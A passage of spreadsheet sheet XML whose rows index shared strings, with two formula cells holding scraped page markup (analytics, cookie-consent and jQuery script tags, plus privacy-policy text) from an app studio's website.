    <row r="1273" spans="1:2">
      <c r="A1273" t="s">
        <v>31</v>
      </c>
      <c r="B1273" t="s">
        <v>1078</v>
      </c>
    </row>
    <row r="1274" spans="1:2">
      <c r="A1274" t="s">
        <v>31</v>
      </c>
      <c r="B1274" t="s">
        <v>1079</v>
      </c>
    </row>
    <row r="1275" spans="1:2">
      <c r="A1275" t="s">
        <v>31</v>
      </c>
      <c r="B1275" t="s">
        <v>1080</v>
      </c>
    </row>
    <row r="1276" spans="1:2">
      <c r="A1276" t="s">
        <v>31</v>
      </c>
      <c r="B1276" t="s">
        <v>1081</v>
      </c>
    </row>
    <row r="1277" spans="1:2">
      <c r="A1277" t="s">
        <v>31</v>
      </c>
      <c r="B1277" t="s">
        <v>1082</v>
      </c>
    </row>
    <row r="1278" spans="1:2">
      <c r="A1278" t="s">
        <v>31</v>
      </c>
      <c r="B1278" t="s">
        <v>1083</v>
      </c>
    </row>
    <row r="1279" spans="1:2">
      <c r="A1279" t="s">
        <v>31</v>
      </c>
      <c r="B1279" t="s">
        <v>1084</v>
      </c>
    </row>
    <row r="1280" spans="1:2">
      <c r="A1280" t="s">
        <v>31</v>
      </c>
      <c r="B1280" t="s">
        <v>1085</v>
      </c>
    </row>
    <row r="1281" spans="1:2">
      <c r="A1281" t="s">
        <v>31</v>
      </c>
      <c r="B1281" t="s">
        <v>1086</v>
      </c>
    </row>
    <row r="1282" spans="1:2">
      <c r="A1282" t="s">
        <v>31</v>
      </c>
      <c r="B1282" t="s">
        <v>1087</v>
      </c>
    </row>
    <row r="1283" spans="1:2">
      <c r="A1283" t="s">
        <v>31</v>
      </c>
      <c r="B1283" t="s">
        <v>1088</v>
      </c>
    </row>
    <row r="1284" spans="1:2">
      <c r="A1284" t="s">
        <v>31</v>
      </c>
      <c r="B1284" t="s">
        <v>1089</v>
      </c>
    </row>
    <row r="1285" spans="1:2">
      <c r="A1285" t="s">
        <v>31</v>
      </c>
      <c r="B1285" t="s">
        <v>1090</v>
      </c>
    </row>
    <row r="1286" spans="1:2">
      <c r="A1286" t="s">
        <v>31</v>
      </c>
      <c r="B1286" t="s">
        <v>1091</v>
      </c>
    </row>
    <row r="1287" spans="1:2">
      <c r="A1287" t="s">
        <v>31</v>
      </c>
      <c r="B1287" t="s">
        <v>1092</v>
      </c>
    </row>
    <row r="1288" spans="1:2">
      <c r="A1288" t="s">
        <v>31</v>
      </c>
      <c r="B1288" t="s">
        <v>1093</v>
      </c>
    </row>
    <row r="1289" spans="1:2">
      <c r="A1289" t="s">
        <v>31</v>
      </c>
      <c r="B1289" t="s">
        <v>1094</v>
      </c>
    </row>
    <row r="1290" spans="1:2">
      <c r="A1290" t="s">
        <v>31</v>
      </c>
      <c r="B1290" t="s">
        <v>1095</v>
      </c>
    </row>
    <row r="1291" spans="1:2">
      <c r="A1291" t="s">
        <v>31</v>
      </c>
      <c r="B1291" t="s">
        <v>1096</v>
      </c>
    </row>
    <row r="1292" spans="1:2">
      <c r="A1292" t="s">
        <v>31</v>
      </c>
      <c r="B1292" t="s">
        <v>1097</v>
      </c>
    </row>
    <row r="1293" spans="1:2">
      <c r="A1293" t="s">
        <v>31</v>
      </c>
      <c r="B1293" t="s">
        <v>1098</v>
      </c>
    </row>
    <row r="1294" spans="1:2">
      <c r="A1294" t="s">
        <v>31</v>
      </c>
      <c r="B1294" t="s">
        <v>1099</v>
      </c>
    </row>
    <row r="1295" spans="1:2">
      <c r="A1295" t="s">
        <v>31</v>
      </c>
      <c r="B1295" t="s">
        <v>1100</v>
      </c>
    </row>
    <row r="1296" spans="1:2">
      <c r="A1296" t="s">
        <v>31</v>
      </c>
      <c r="B1296" t="s">
        <v>1101</v>
      </c>
    </row>
    <row r="1297" spans="1:2">
      <c r="A1297" t="s">
        <v>31</v>
      </c>
      <c r="B1297" t="s">
        <v>1102</v>
      </c>
    </row>
    <row r="1298" spans="1:2">
      <c r="A1298" t="s">
        <v>31</v>
      </c>
      <c r="B1298" t="s">
        <v>1103</v>
      </c>
    </row>
    <row r="1299" spans="1:2">
      <c r="A1299" t="s">
        <v>31</v>
      </c>
      <c r="B1299" t="s">
        <v>1104</v>
      </c>
    </row>
    <row r="1300" spans="1:2">
      <c r="A1300" t="s">
        <v>31</v>
      </c>
      <c r="B1300" t="s">
        <v>1105</v>
      </c>
    </row>
    <row r="1301" spans="1:2">
      <c r="A1301" t="s">
        <v>31</v>
      </c>
      <c r="B1301" t="s">
        <v>1106</v>
      </c>
    </row>
    <row r="1302" spans="1:2">
      <c r="A1302" t="s">
        <v>31</v>
      </c>
      <c r="B1302" t="s">
        <v>1107</v>
      </c>
    </row>
    <row r="1303" spans="1:2">
      <c r="A1303" t="s">
        <v>31</v>
      </c>
      <c r="B1303" t="s">
        <v>1108</v>
      </c>
    </row>
    <row r="1304" spans="1:2">
      <c r="A1304" t="s">
        <v>31</v>
      </c>
      <c r="B1304" t="s">
        <v>1109</v>
      </c>
    </row>
    <row r="1305" spans="1:2">
      <c r="A1305" t="s">
        <v>31</v>
      </c>
      <c r="B1305" t="s">
        <v>1057</v>
      </c>
    </row>
    <row r="1306" spans="1:2">
      <c r="A1306" t="s">
        <v>31</v>
      </c>
      <c r="B1306" t="s">
        <v>1058</v>
      </c>
    </row>
    <row r="1307" spans="1:2">
      <c r="A1307" t="s">
        <v>31</v>
      </c>
      <c r="B1307" t="s">
        <v>1059</v>
      </c>
    </row>
    <row r="1308" spans="1:2">
      <c r="A1308" t="s">
        <v>31</v>
      </c>
      <c r="B1308" t="s">
        <v>1060</v>
      </c>
    </row>
    <row r="1309" spans="1:2">
      <c r="A1309" t="s">
        <v>31</v>
      </c>
      <c r="B1309" t="s">
        <v>1061</v>
      </c>
    </row>
    <row r="1310" spans="1:2">
      <c r="A1310" t="s">
        <v>31</v>
      </c>
      <c r="B1310" t="s">
        <v>1062</v>
      </c>
    </row>
    <row r="1311" spans="1:2">
      <c r="A1311" t="s">
        <v>31</v>
      </c>
      <c r="B1311" t="s">
        <v>1063</v>
      </c>
    </row>
    <row r="1312" spans="1:2">
      <c r="A1312" t="s">
        <v>31</v>
      </c>
      <c r="B1312" t="s">
        <v>1064</v>
      </c>
    </row>
    <row r="1313" spans="1:2">
      <c r="A1313" t="s">
        <v>31</v>
      </c>
      <c r="B1313" t="s">
        <v>1065</v>
      </c>
    </row>
    <row r="1314" spans="1:2">
      <c r="A1314" t="s">
        <v>31</v>
      </c>
      <c r="B1314" t="s">
        <v>1066</v>
      </c>
    </row>
    <row r="1315" spans="1:2">
      <c r="A1315" t="s">
        <v>31</v>
      </c>
      <c r="B1315" t="s">
        <v>1067</v>
      </c>
    </row>
    <row r="1316" spans="1:2">
      <c r="A1316" t="s">
        <v>31</v>
      </c>
      <c r="B1316" t="s">
        <v>1068</v>
      </c>
    </row>
    <row r="1317" spans="1:2">
      <c r="A1317" t="s">
        <v>31</v>
      </c>
      <c r="B1317" t="s">
        <v>1069</v>
      </c>
    </row>
    <row r="1318" spans="1:2">
      <c r="A1318" t="s">
        <v>31</v>
      </c>
      <c r="B1318" t="s">
        <v>1070</v>
      </c>
    </row>
    <row r="1319" spans="1:2">
      <c r="A1319" t="s">
        <v>31</v>
      </c>
      <c r="B1319" t="s">
        <v>1071</v>
      </c>
    </row>
    <row r="1320" spans="1:2">
      <c r="A1320" t="s">
        <v>31</v>
      </c>
      <c r="B1320" t="s">
        <v>1072</v>
      </c>
    </row>
    <row r="1321" spans="1:2">
      <c r="A1321" t="s">
        <v>31</v>
      </c>
      <c r="B1321" t="s">
        <v>1073</v>
      </c>
    </row>
    <row r="1322" spans="1:2">
      <c r="A1322" t="s">
        <v>31</v>
      </c>
      <c r="B1322" t="s">
        <v>1074</v>
      </c>
    </row>
    <row r="1323" spans="1:2">
      <c r="A1323" t="s">
        <v>31</v>
      </c>
      <c r="B1323" t="s">
        <v>1075</v>
      </c>
    </row>
    <row r="1324" spans="1:2">
      <c r="A1324" t="s">
        <v>31</v>
      </c>
      <c r="B1324" t="s">
        <v>1076</v>
      </c>
    </row>
    <row r="1325" spans="1:2">
      <c r="A1325" t="s">
        <v>31</v>
      </c>
      <c r="B1325" t="s">
        <v>1077</v>
      </c>
    </row>
    <row r="1326" spans="1:2">
      <c r="A1326" t="s">
        <v>31</v>
      </c>
      <c r="B1326" t="s">
        <v>1078</v>
      </c>
    </row>
    <row r="1327" spans="1:2">
      <c r="A1327" t="s">
        <v>31</v>
      </c>
      <c r="B1327" t="s">
        <v>1079</v>
      </c>
    </row>
    <row r="1328" spans="1:2">
      <c r="A1328" t="s">
        <v>31</v>
      </c>
      <c r="B1328" t="s">
        <v>1080</v>
      </c>
    </row>
    <row r="1329" spans="1:2">
      <c r="A1329" t="s">
        <v>31</v>
      </c>
      <c r="B1329" t="s">
        <v>1081</v>
      </c>
    </row>
    <row r="1330" spans="1:2">
      <c r="A1330" t="s">
        <v>31</v>
      </c>
      <c r="B1330" t="s">
        <v>1082</v>
      </c>
    </row>
    <row r="1331" spans="1:2">
      <c r="A1331" t="s">
        <v>31</v>
      </c>
      <c r="B1331" t="s">
        <v>1083</v>
      </c>
    </row>
    <row r="1332" spans="1:2">
      <c r="A1332" t="s">
        <v>31</v>
      </c>
      <c r="B1332" t="s">
        <v>1084</v>
      </c>
    </row>
    <row r="1333" spans="1:2">
      <c r="A1333" t="s">
        <v>31</v>
      </c>
      <c r="B1333" t="s">
        <v>1085</v>
      </c>
    </row>
    <row r="1334" spans="1:2">
      <c r="A1334" t="s">
        <v>31</v>
      </c>
      <c r="B1334" t="s">
        <v>1086</v>
      </c>
    </row>
    <row r="1335" spans="1:2">
      <c r="A1335" t="s">
        <v>31</v>
      </c>
      <c r="B1335" t="s">
        <v>1087</v>
      </c>
    </row>
    <row r="1336" spans="1:2">
      <c r="A1336" t="s">
        <v>31</v>
      </c>
      <c r="B1336" t="s">
        <v>1088</v>
      </c>
    </row>
    <row r="1337" spans="1:2">
      <c r="A1337" t="s">
        <v>31</v>
      </c>
      <c r="B1337" t="s">
        <v>1089</v>
      </c>
    </row>
    <row r="1338" spans="1:2">
      <c r="A1338" t="s">
        <v>31</v>
      </c>
      <c r="B1338" t="s">
        <v>1090</v>
      </c>
    </row>
    <row r="1339" spans="1:2">
      <c r="A1339" t="s">
        <v>31</v>
      </c>
      <c r="B1339" t="s">
        <v>1091</v>
      </c>
    </row>
    <row r="1340" spans="1:2">
      <c r="A1340" t="s">
        <v>31</v>
      </c>
      <c r="B1340" t="s">
        <v>1092</v>
      </c>
    </row>
    <row r="1341" spans="1:2">
      <c r="A1341" t="s">
        <v>31</v>
      </c>
      <c r="B1341" t="s">
        <v>1093</v>
      </c>
    </row>
    <row r="1342" spans="1:2">
      <c r="A1342" t="s">
        <v>31</v>
      </c>
      <c r="B1342" t="s">
        <v>1094</v>
      </c>
    </row>
    <row r="1343" spans="1:2">
      <c r="A1343" t="s">
        <v>31</v>
      </c>
      <c r="B1343" t="s">
        <v>1095</v>
      </c>
    </row>
    <row r="1344" spans="1:2">
      <c r="A1344" t="s">
        <v>31</v>
      </c>
      <c r="B1344" t="s">
        <v>1096</v>
      </c>
    </row>
    <row r="1345" spans="1:2">
      <c r="A1345" t="s">
        <v>31</v>
      </c>
      <c r="B1345" t="s">
        <v>1097</v>
      </c>
    </row>
    <row r="1346" spans="1:2">
      <c r="A1346" t="s">
        <v>31</v>
      </c>
      <c r="B1346" t="s">
        <v>1098</v>
      </c>
    </row>
    <row r="1347" spans="1:2">
      <c r="A1347" t="s">
        <v>31</v>
      </c>
      <c r="B1347" t="s">
        <v>1099</v>
      </c>
    </row>
    <row r="1348" spans="1:2">
      <c r="A1348" t="s">
        <v>31</v>
      </c>
      <c r="B1348" t="s">
        <v>1100</v>
      </c>
    </row>
    <row r="1349" spans="1:2">
      <c r="A1349" t="s">
        <v>31</v>
      </c>
      <c r="B1349" t="s">
        <v>1101</v>
      </c>
    </row>
    <row r="1350" spans="1:2">
      <c r="A1350" t="s">
        <v>31</v>
      </c>
      <c r="B1350" t="s">
        <v>1102</v>
      </c>
    </row>
    <row r="1351" spans="1:2">
      <c r="A1351" t="s">
        <v>31</v>
      </c>
      <c r="B1351" t="s">
        <v>1103</v>
      </c>
    </row>
    <row r="1352" spans="1:2">
      <c r="A1352" t="s">
        <v>31</v>
      </c>
      <c r="B1352" t="s">
        <v>1104</v>
      </c>
    </row>
    <row r="1353" spans="1:2">
      <c r="A1353" t="s">
        <v>31</v>
      </c>
      <c r="B1353" t="s">
        <v>1105</v>
      </c>
    </row>
    <row r="1354" spans="1:2">
      <c r="A1354" t="s">
        <v>31</v>
      </c>
      <c r="B1354" t="s">
        <v>1106</v>
      </c>
    </row>
    <row r="1355" spans="1:2">
      <c r="A1355" t="s">
        <v>31</v>
      </c>
      <c r="B1355" t="s">
        <v>1107</v>
      </c>
    </row>
    <row r="1356" spans="1:2">
      <c r="A1356" t="s">
        <v>31</v>
      </c>
      <c r="B1356" t="s">
        <v>1108</v>
      </c>
    </row>
    <row r="1357" spans="1:2">
      <c r="A1357" t="s">
        <v>31</v>
      </c>
      <c r="B1357" t="s">
        <v>1109</v>
      </c>
    </row>
    <row r="1358" spans="1:2">
      <c r="A1358" t="s">
        <v>31</v>
      </c>
      <c r="B1358" t="s">
        <v>1057</v>
      </c>
    </row>
    <row r="1359" spans="1:2">
      <c r="A1359" t="s">
        <v>31</v>
      </c>
      <c r="B1359" t="s">
        <v>1058</v>
      </c>
    </row>
    <row r="1360" spans="1:2">
      <c r="A1360" t="s">
        <v>31</v>
      </c>
      <c r="B1360" t="s">
        <v>1059</v>
      </c>
    </row>
    <row r="1361" spans="1:2">
      <c r="A1361" t="s">
        <v>31</v>
      </c>
      <c r="B1361" t="s">
        <v>1060</v>
      </c>
    </row>
    <row r="1362" spans="1:2">
      <c r="A1362" t="s">
        <v>31</v>
      </c>
      <c r="B1362" t="s">
        <v>1061</v>
      </c>
    </row>
    <row r="1363" spans="1:2">
      <c r="A1363" t="s">
        <v>31</v>
      </c>
      <c r="B1363" t="s">
        <v>1062</v>
      </c>
    </row>
    <row r="1364" spans="1:2">
      <c r="A1364" t="s">
        <v>31</v>
      </c>
      <c r="B1364" t="s">
        <v>1063</v>
      </c>
    </row>
    <row r="1365" spans="1:2">
      <c r="A1365" t="s">
        <v>31</v>
      </c>
      <c r="B1365" t="s">
        <v>1064</v>
      </c>
    </row>
    <row r="1366" spans="1:2">
      <c r="A1366" t="s">
        <v>31</v>
      </c>
      <c r="B1366" t="s">
        <v>1065</v>
      </c>
    </row>
    <row r="1367" spans="1:2">
      <c r="A1367" t="s">
        <v>31</v>
      </c>
      <c r="B1367" t="s">
        <v>1066</v>
      </c>
    </row>
    <row r="1368" spans="1:2">
      <c r="A1368" t="s">
        <v>31</v>
      </c>
      <c r="B1368" t="s">
        <v>1067</v>
      </c>
    </row>
    <row r="1369" spans="1:2">
      <c r="A1369" t="s">
        <v>31</v>
      </c>
      <c r="B1369" t="s">
        <v>1068</v>
      </c>
    </row>
    <row r="1370" spans="1:2">
      <c r="A1370" t="s">
        <v>31</v>
      </c>
      <c r="B1370" t="s">
        <v>1069</v>
      </c>
    </row>
    <row r="1371" spans="1:2">
      <c r="A1371" t="s">
        <v>31</v>
      </c>
      <c r="B1371" t="s">
        <v>1070</v>
      </c>
    </row>
    <row r="1372" spans="1:2">
      <c r="A1372" t="s">
        <v>31</v>
      </c>
      <c r="B1372" t="s">
        <v>1071</v>
      </c>
    </row>
    <row r="1373" spans="1:2">
      <c r="A1373" t="s">
        <v>31</v>
      </c>
      <c r="B1373" t="s">
        <v>1072</v>
      </c>
    </row>
    <row r="1374" spans="1:2">
      <c r="A1374" t="s">
        <v>31</v>
      </c>
      <c r="B1374" t="s">
        <v>1073</v>
      </c>
    </row>
    <row r="1375" spans="1:2">
      <c r="A1375" t="s">
        <v>31</v>
      </c>
      <c r="B1375" t="s">
        <v>1074</v>
      </c>
    </row>
    <row r="1376" spans="1:2">
      <c r="A1376" t="s">
        <v>31</v>
      </c>
      <c r="B1376" t="s">
        <v>1075</v>
      </c>
    </row>
    <row r="1377" spans="1:2">
      <c r="A1377" t="s">
        <v>31</v>
      </c>
      <c r="B1377" t="s">
        <v>1076</v>
      </c>
    </row>
    <row r="1378" spans="1:2">
      <c r="A1378" t="s">
        <v>31</v>
      </c>
      <c r="B1378" t="s">
        <v>1077</v>
      </c>
    </row>
    <row r="1379" spans="1:2">
      <c r="A1379" t="s">
        <v>31</v>
      </c>
      <c r="B1379" t="s">
        <v>1078</v>
      </c>
    </row>
    <row r="1380" spans="1:2">
      <c r="A1380" t="s">
        <v>31</v>
      </c>
      <c r="B1380" t="s">
        <v>1079</v>
      </c>
    </row>
    <row r="1381" spans="1:2">
      <c r="A1381" t="s">
        <v>31</v>
      </c>
      <c r="B1381" t="s">
        <v>1080</v>
      </c>
    </row>
    <row r="1382" spans="1:2">
      <c r="A1382" t="s">
        <v>31</v>
      </c>
      <c r="B1382" t="s">
        <v>1081</v>
      </c>
    </row>
    <row r="1383" spans="1:2">
      <c r="A1383" t="s">
        <v>31</v>
      </c>
      <c r="B1383" t="s">
        <v>1082</v>
      </c>
    </row>
    <row r="1384" spans="1:2">
      <c r="A1384" t="s">
        <v>31</v>
      </c>
      <c r="B1384" t="s">
        <v>1083</v>
      </c>
    </row>
    <row r="1385" spans="1:2">
      <c r="A1385" t="s">
        <v>31</v>
      </c>
      <c r="B1385" t="s">
        <v>1084</v>
      </c>
    </row>
    <row r="1386" spans="1:2">
      <c r="A1386" t="s">
        <v>31</v>
      </c>
      <c r="B1386" t="s">
        <v>1085</v>
      </c>
    </row>
    <row r="1387" spans="1:2">
      <c r="A1387" t="s">
        <v>31</v>
      </c>
      <c r="B1387" t="s">
        <v>1086</v>
      </c>
    </row>
    <row r="1388" spans="1:2">
      <c r="A1388" t="s">
        <v>31</v>
      </c>
      <c r="B1388" t="s">
        <v>1087</v>
      </c>
    </row>
    <row r="1389" spans="1:2">
      <c r="A1389" t="s">
        <v>31</v>
      </c>
      <c r="B1389" t="s">
        <v>1088</v>
      </c>
    </row>
    <row r="1390" spans="1:2">
      <c r="A1390" t="s">
        <v>31</v>
      </c>
      <c r="B1390" t="s">
        <v>1089</v>
      </c>
    </row>
    <row r="1391" spans="1:2">
      <c r="A1391" t="s">
        <v>31</v>
      </c>
      <c r="B1391" t="s">
        <v>1090</v>
      </c>
    </row>
    <row r="1392" spans="1:2">
      <c r="A1392" t="s">
        <v>31</v>
      </c>
      <c r="B1392" t="s">
        <v>1091</v>
      </c>
    </row>
    <row r="1393" spans="1:2">
      <c r="A1393" t="s">
        <v>31</v>
      </c>
      <c r="B1393" t="s">
        <v>1092</v>
      </c>
    </row>
    <row r="1394" spans="1:2">
      <c r="A1394" t="s">
        <v>31</v>
      </c>
      <c r="B1394" t="s">
        <v>1093</v>
      </c>
    </row>
    <row r="1395" spans="1:2">
      <c r="A1395" t="s">
        <v>31</v>
      </c>
      <c r="B1395" t="s">
        <v>1094</v>
      </c>
    </row>
    <row r="1396" spans="1:2">
      <c r="A1396" t="s">
        <v>31</v>
      </c>
      <c r="B1396" t="s">
        <v>1095</v>
      </c>
    </row>
    <row r="1397" spans="1:2">
      <c r="A1397" t="s">
        <v>31</v>
      </c>
      <c r="B1397" t="s">
        <v>1096</v>
      </c>
    </row>
    <row r="1398" spans="1:2">
      <c r="A1398" t="s">
        <v>31</v>
      </c>
      <c r="B1398" t="s">
        <v>1097</v>
      </c>
    </row>
    <row r="1399" spans="1:2">
      <c r="A1399" t="s">
        <v>31</v>
      </c>
      <c r="B1399" t="s">
        <v>1098</v>
      </c>
    </row>
    <row r="1400" spans="1:2">
      <c r="A1400" t="s">
        <v>31</v>
      </c>
      <c r="B1400" t="s">
        <v>1099</v>
      </c>
    </row>
    <row r="1401" spans="1:2">
      <c r="A1401" t="s">
        <v>31</v>
      </c>
      <c r="B1401" t="s">
        <v>1100</v>
      </c>
    </row>
    <row r="1402" spans="1:2">
      <c r="A1402" t="s">
        <v>31</v>
      </c>
      <c r="B1402" t="s">
        <v>1101</v>
      </c>
    </row>
    <row r="1403" spans="1:2">
      <c r="A1403" t="s">
        <v>31</v>
      </c>
      <c r="B1403" t="s">
        <v>1102</v>
      </c>
    </row>
    <row r="1404" spans="1:2">
      <c r="A1404" t="s">
        <v>31</v>
      </c>
      <c r="B1404" t="s">
        <v>1103</v>
      </c>
    </row>
    <row r="1405" spans="1:2">
      <c r="A1405" t="s">
        <v>31</v>
      </c>
      <c r="B1405" t="s">
        <v>1104</v>
      </c>
    </row>
    <row r="1406" spans="1:2">
      <c r="A1406" t="s">
        <v>31</v>
      </c>
      <c r="B1406" t="s">
        <v>1105</v>
      </c>
    </row>
    <row r="1407" spans="1:2">
      <c r="A1407" t="s">
        <v>31</v>
      </c>
      <c r="B1407" t="s">
        <v>1106</v>
      </c>
    </row>
    <row r="1408" spans="1:2">
      <c r="A1408" t="s">
        <v>31</v>
      </c>
      <c r="B1408" t="s">
        <v>1107</v>
      </c>
    </row>
    <row r="1409" spans="1:2">
      <c r="A1409" t="s">
        <v>31</v>
      </c>
      <c r="B1409" t="s">
        <v>1108</v>
      </c>
    </row>
    <row r="1410" spans="1:2">
      <c r="A1410" t="s">
        <v>31</v>
      </c>
      <c r="B1410" t="s">
        <v>1109</v>
      </c>
    </row>
    <row r="1411" spans="1:2">
      <c r="A1411" t="s">
        <v>5</v>
      </c>
      <c r="B1411" t="s">
        <v>316</v>
      </c>
    </row>
    <row r="1412" spans="1:2">
      <c r="A1412" t="s">
        <v>5</v>
      </c>
      <c r="B1412" t="s">
        <v>317</v>
      </c>
    </row>
    <row r="1413" spans="1:2">
      <c r="A1413" t="s">
        <v>5</v>
      </c>
      <c r="B1413" t="s">
        <v>318</v>
      </c>
    </row>
    <row r="1414" spans="1:2">
      <c r="A1414" t="s">
        <v>5</v>
      </c>
      <c r="B1414" t="s">
        <v>319</v>
      </c>
    </row>
    <row r="1415" spans="1:2">
      <c r="A1415" t="s">
        <v>5</v>
      </c>
      <c r="B1415" t="s">
        <v>320</v>
      </c>
    </row>
    <row r="1416" spans="1:2">
      <c r="A1416" t="s">
        <v>5</v>
      </c>
      <c r="B1416" t="s">
        <v>321</v>
      </c>
    </row>
    <row r="1417" spans="1:2">
      <c r="A1417" t="s">
        <v>5</v>
      </c>
      <c r="B1417" t="s">
        <v>322</v>
      </c>
    </row>
    <row r="1418" spans="1:2">
      <c r="A1418" t="s">
        <v>5</v>
      </c>
      <c r="B1418">
        <f> window.dataLayer || [];
    function gtag(){dataLayer.push(arguments);}
    gtag('js', new Date());
    gtag('config', 'UA-84213520-6');
&lt;/script&gt; --&gt;
&lt;script&gt;
    window.addEventListener("load", function(){
        window.cookieconsent.initialise({
            "palette": {
                "popup": {
                    "background": "#000"
                },
                "button": {
                    "background": "#f1d600"
                }
            },
            "position": "bottom-left"
        })});
&lt;/script&gt;
&lt;!-- All JS --&gt;
&lt;script src="https://gunjanappstudios.com/public/frontend/js/jquery-1.11.0.min.js"&gt;&lt;/script&gt;
&lt;script src="https://gunjanappstudios.com/public/frontend/js/jquery-migrate-1.2.1.min.js" defer&gt;&lt;/script&gt;
&lt;script src="https://gunjanappstudios.com/public/layerslider/greensock.js" defer&gt;&lt;/script&gt;
&lt;script src="https://gunjanappstudios.com/public/layerslider/jquery.easing.1.3.js" defer&gt;&lt;/script&gt;
&lt;script src="https://gunjanappstudios.com/public/layerslider/layerslider.transitions.js" defer&gt;&lt;/script&gt;
&lt;script src="https://gunjanappstudios.com/public/layerslider/layerslider.kreaturamedia.jquery.js " defer&gt;&lt;/script&gt;
&lt;script src="https://gunjanappstudios.com/public/frontend/js/cookieconsent.min.js"&gt;&lt;/script&gt;
&lt;!--</f>
        <v>0</v>
      </c>
    </row>
    <row r="1419" spans="1:2">
      <c r="A1419" t="s">
        <v>5</v>
      </c>
      <c r="B1419" t="s">
        <v>323</v>
      </c>
    </row>
    <row r="1420" spans="1:2">
      <c r="A1420" t="s">
        <v>5</v>
      </c>
      <c r="B1420" t="s">
        <v>324</v>
      </c>
    </row>
    <row r="1421" spans="1:2">
      <c r="A1421" t="s">
        <v>5</v>
      </c>
      <c r="B1421" t="s">
        <v>325</v>
      </c>
    </row>
    <row r="1422" spans="1:2">
      <c r="A1422" t="s">
        <v>5</v>
      </c>
      <c r="B1422" t="s">
        <v>326</v>
      </c>
    </row>
    <row r="1423" spans="1:2">
      <c r="A1423" t="s">
        <v>5</v>
      </c>
      <c r="B1423" t="s">
        <v>327</v>
      </c>
    </row>
    <row r="1424" spans="1:2">
      <c r="A1424" t="s">
        <v>5</v>
      </c>
      <c r="B1424" t="s">
        <v>328</v>
      </c>
    </row>
    <row r="1425" spans="1:2">
      <c r="A1425" t="s">
        <v>5</v>
      </c>
      <c r="B1425" t="s">
        <v>329</v>
      </c>
    </row>
    <row r="1426" spans="1:2">
      <c r="A1426" t="s">
        <v>5</v>
      </c>
      <c r="B1426" t="s">
        <v>330</v>
      </c>
    </row>
    <row r="1427" spans="1:2">
      <c r="A1427" t="s">
        <v>5</v>
      </c>
      <c r="B1427" t="s">
        <v>331</v>
      </c>
    </row>
    <row r="1428" spans="1:2">
      <c r="A1428" t="s">
        <v>5</v>
      </c>
      <c r="B1428" t="s">
        <v>332</v>
      </c>
    </row>
    <row r="1429" spans="1:2">
      <c r="A1429" t="s">
        <v>5</v>
      </c>
      <c r="B1429">
        <f> $(window).scrollTop();
    if (scrollTop &gt; 249) {
        // $('.header').addClass('fadeOutLeft');
        // $('.header').removeClass('fadeInLeft');
        $('.header-sticky').addClass('fadeInDown');
        $('.header-sticky').removeClass('fadeOutUp');
        $('.header-sticky').addClass('animated');      
    } else {
        // $('.header').addClass('fadeInLeft');
        // $('.header').removeClass('fadeOutLeft');
        $('.header-sticky').addClass('fadeInDown');
        $('.header-sticky').removeClass('fadeInDown');
    }
  });
});
&lt;/script&gt;
&lt;style type="text/css"&gt;
.header-sticky.fadeInDown {
    position: fixed;
    width: 100%;
    opacity: 0;
    z-index: 999;
}
&lt;/style&gt;
    &lt;div class="page-banner" style="background-image: url(https://gunjanappstudios.com/public/uploads/banner_privacy.png)"&gt;
        &lt;div class="bg-page"&gt;&lt;/div&gt;
        &lt;div class="text"&gt;
            &lt;h1&gt;Privacy Policy&lt;/h1&gt;
            &lt;nav aria-label="breadcrumb"&gt;
                &lt;ol class="breadcrumb justify-content-center"&gt;
                    &lt;li class="breadcrumb-item"&gt;&lt;a href="https://gunjanappstudios.com"&gt;Home&lt;/a&gt;&lt;/li&gt;
                    &lt;li class="breadcrumb-item active" aria-current="page"&gt;Privacy Policy&lt;/li&gt;
                &lt;/ol&gt;
            &lt;/nav&gt;
        &lt;/div&gt;
        &lt;div id="privacy-policy"&gt;&lt;/div&gt;
    &lt;/div&gt;
    &lt;!--mobile banner--&gt;
    &lt;div class="mobile-banner"&gt;
        &lt;img src="https://gunjanappstudios.com/public/uploads/banner_privacy_mobile.png"&gt;
    &lt;/div&gt;
    &lt;div class="page-content"&gt;
        &lt;div class="container"&gt;
            &lt;div class="heading"&gt;
                &lt;h2 class="heding_s"&gt;Privacy Policy&lt;/h2&gt;
            &lt;/div&gt;
            &lt;div class="row"&gt;
                &lt;div class="col-md-12"&gt;
                    &lt;p&gt;_x000D_
                        &lt;b&gt;Privacy Policy&lt;/b&gt;_x000D_
                        &lt;br&gt;_x000D_
                    &lt;/p&gt;_x000D_
                    &lt;p&gt;We respect and value your privacy here at GunjanApps Studios.&lt;/p&gt;_x000D_
                    &lt;p&gt;Our Privacy Policy describes the information collected by our company GunjanApps Studios, and our partners, through our mobile applications and the use of the information.&lt;/p&gt;_x000D_
                    &lt;p&gt;</f>
        <v>0</v>
      </c>
    </row>
    <row r="1430" spans="1:2">
      <c r="A1430" t="s">
        <v>5</v>
      </c>
      <c r="B1430" t="s">
        <v>333</v>
      </c>
    </row>
    <row r="1431" spans="1:2">
      <c r="A1431" t="s">
        <v>5</v>
      </c>
      <c r="B1431" t="s">
        <v>334</v>
      </c>
    </row>
    <row r="1432" spans="1:2">
      <c r="A1432" t="s">
        <v>5</v>
      </c>
      <c r="B1432" t="s">
        <v>335</v>
      </c>
    </row>
    <row r="1433" spans="1:2">
      <c r="A1433" t="s">
        <v>5</v>
      </c>
      <c r="B1433" t="s">
        <v>336</v>
      </c>
    </row>
    <row r="1434" spans="1:2">
      <c r="A1434" t="s">
        <v>5</v>
      </c>
      <c r="B1434" t="s">
        <v>337</v>
      </c>
    </row>
    <row r="1435" spans="1:2">
      <c r="A1435" t="s">
        <v>5</v>
      </c>
      <c r="B1435" t="s">
        <v>338</v>
      </c>
    </row>
    <row r="1436" spans="1:2">
      <c r="A1436" t="s">
        <v>5</v>
      </c>
      <c r="B1436" t="s">
        <v>339</v>
      </c>
    </row>
    <row r="1437" spans="1:2">
      <c r="A1437" t="s">
        <v>5</v>
      </c>
      <c r="B1437" t="s">
        <v>340</v>
      </c>
    </row>
    <row r="1438" spans="1:2">
      <c r="A1438" t="s">
        <v>5</v>
      </c>
      <c r="B1438" t="s">
        <v>341</v>
      </c>
    </row>
    <row r="1439" spans="1:2">
      <c r="A1439" t="s">
        <v>5</v>
      </c>
      <c r="B1439" t="s">
        <v>342</v>
      </c>
    </row>
    <row r="1440" spans="1:2">
      <c r="A1440" t="s">
        <v>32</v>
      </c>
      <c r="B1440" t="s">
        <v>1110</v>
      </c>
    </row>
    <row r="1441" spans="1:2">
      <c r="A1441" t="s">
        <v>32</v>
      </c>
      <c r="B1441" t="s">
        <v>1111</v>
      </c>
    </row>
    <row r="1442" spans="1:2">
      <c r="A1442" t="s">
        <v>32</v>
      </c>
      <c r="B1442" t="s">
        <v>1112</v>
      </c>
